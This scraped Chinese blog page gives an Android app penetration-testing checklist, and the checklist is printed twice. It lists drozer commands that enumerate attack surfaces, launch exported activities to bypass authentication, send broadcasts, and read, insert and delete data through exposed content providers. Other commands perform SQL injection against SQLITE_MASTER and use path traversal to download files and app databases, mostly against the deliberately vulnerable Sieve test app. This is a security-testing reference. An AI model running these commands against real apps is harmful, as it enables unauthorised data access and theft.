apk-checklist
来源:互联网 发布:js拼接字符串逗号隔开 编辑:程序博客网 时间:2024/06/10 14:00
adb forward tcp:31415 tcp:31415
C:\Program Files\drozer
drozer console connect 或 C:\drozer\drozer.bat console connect
E:\APK\adt-bundle-windows-x86_64-20140702\sdk\tools
获取apk信息
?1)查找终端设备所有APK信息
Run app.packege.list –f过滤信息
?(2)具体查看某个APK信息
Run app.package.info –a apk名
?(3)查找APK存在的攻击面(activity、contentprovider、service)
Run app.package.attacksurface apk名
绕过Activity鉴权
?(1)收集Activity的信息进行收集,查找暴露的Activity
Run app.activity.info –a apk包名
(2)构造intent信息绕过鉴权直接运行Activity
Run app.activity.start –-componentcom.mwr.example.sieve包名
dz> run app.activity.start –component com.isi.testapp com.isi.testapp.Welcome
dz> run app.broadcast.info -a com.xxx.activity -i
dz> run app.broadcast.send --component 包名 --action android.intent.action.XXX
#空action情况
run app.broadcast.send --component 包名 广播名
dz> run app.broadcast.send --component com.xxx.activity com.xxx.lock.MyExitReceiver
dz> run app.broadcast.send --component com.xxx.activity com.xxx.lock.LockScreenReceiver
#空extras情况
dz> run app.broadcast.send --action wisorg.intent.action.PUSH_MESSAGE
利用ContentProvider攻击
?(1)收集ContentProvider的信息进行收集,查找暴露的ContentProvider
Run app.provider.info –a apk包名
?(2)发现暴露的ContentProvider后,可以对数据库进行探测。探测出可以查询的URI
Run scanner.provider.finduris –a apk包名
?(3)查看数据库中的内容
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Run app.provider.query URI –vertical
?(4)对数据库表进行插入操作
Run app.provider.insert URI对应数据表中的字段
?(5)对数据库表进行删除操作
Run app.provider.delete URI–-selection “条件”
SQL注入
?(1)查看URI对应的数据库表
Run app.provider.query URI–-projection “ ‘ ”
Run app.provider.query URI–-selection “ ‘ ”
?(2)可以通过返回的错误信息展示出改Content准备执行的语句,获取数据库中的信息
Run app.provider.query URI–projection “* From SQLITE_MASTER WHERE type=‘table’;--”
Run app.provider.query URI–-selection “_id = ?”
检测sql注入和目录遍历
dz> run scanner.provider.injection -a com.mwr.example.sieve
dz> run scanner.provider.traversal -a com.mwr.example.sieve
遍历下载文件
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sie
ve/databases/database.db /home/user/database.db
利用dz进行开启或者权限提升命令
dz> run app.service.info -a com.mwr.example.sieve
dz> run app.service.start --action xxx --extra xxxx
C:\Program Files\drozer
drozer console connect 或 C:\drozer\drozer.bat console connect
E:\APK\adt-bundle-windows-x86_64-20140702\sdk\tools
获取apk信息
?1)查找终端设备所有APK信息
Run app.packege.list –f过滤信息
?(2)具体查看某个APK信息
Run app.package.info –a apk名
?(3)查找APK存在的攻击面(activity、contentprovider、service)
Run app.package.attacksurface apk名
绕过Activity鉴权
?(1)收集Activity的信息进行收集,查找暴露的Activity
Run app.activity.info –a apk包名
(2)构造intent信息绕过鉴权直接运行Activity
Run app.activity.start –-componentcom.mwr.example.sieve包名
dz> run app.activity.start –component com.isi.testapp com.isi.testapp.Welcome
dz> run app.broadcast.info -a com.xxx.activity -i
dz> run app.broadcast.send --component 包名 --action android.intent.action.XXX
#空action情况
run app.broadcast.send --component 包名 广播名
dz> run app.broadcast.send --component com.xxx.activity com.xxx.lock.MyExitReceiver
dz> run app.broadcast.send --component com.xxx.activity com.xxx.lock.LockScreenReceiver
#空extras情况
dz> run app.broadcast.send --action wisorg.intent.action.PUSH_MESSAGE
利用ContentProvider攻击
?(1)收集ContentProvider的信息进行收集,查找暴露的ContentProvider
Run app.provider.info –a apk包名
?(2)发现暴露的ContentProvider后,可以对数据库进行探测。探测出可以查询的URI
Run scanner.provider.finduris –a apk包名
?(3)查看数据库中的内容
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Run app.provider.query URI –vertical
?(4)对数据库表进行插入操作
Run app.provider.insert URI对应数据表中的字段
?(5)对数据库表进行删除操作
Run app.provider.delete URI–-selection “条件”
SQL注入
?(1)查看URI对应的数据库表
Run app.provider.query URI–-projection “ ‘ ”
Run app.provider.query URI–-selection “ ‘ ”
?(2)可以通过返回的错误信息展示出改Content准备执行的语句,获取数据库中的信息
Run app.provider.query URI–projection “* From SQLITE_MASTER WHERE type=‘table’;--”
Run app.provider.query URI–-selection “_id = ?”
检测sql注入和目录遍历
dz> run scanner.provider.injection -a com.mwr.example.sieve
dz> run scanner.provider.traversal -a com.mwr.example.sieve
遍历下载文件
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sie
ve/databases/database.db /home/user/database.db
利用dz进行开启或者权限提升命令
dz> run app.service.info -a com.mwr.example.sieve
dz> run app.service.start --action xxx --extra xxxx
阅读全文
0 0
- apk-checklist
- checklist
- checklist
- checkList
- nist checklist
- 用好CheckList
- 测试CheckList
- android checklist
- Launch Checklist
- Android CheckList
- 开发checklist
- 可用性checklist
- Cow Checklist
- 上线checklist
- C# Code Review Checklist
- C# Code Review Checklist
- Code Review Checklist
- Agile Development Checklist
- HBase与mapreduce集成操作,以及出错的解决方法
- 内存管理
- C++中的接口与实现
- 深度学习第四章-数值计算笔记
- SVN服务器搭建和使用(三)
- apk-checklist
- for(let i = 0; i < 10; i++)和for(var i = 0; i < 10; i++)的思考
- 小白学分布式程序开发13-幂等性
- tuxedo管理命令之tmadmin
- 如何在微信公众号上进行中医预约
- HDU 2896:病毒侵袭(AC自动机入门题)
- 笔试面试知识细节
- 编写一个讲输入复制到输出的程序,并将其中连续的多个空格用一个空格代替。
- VisualSVN错误 Cannot query proxy blanket解决办法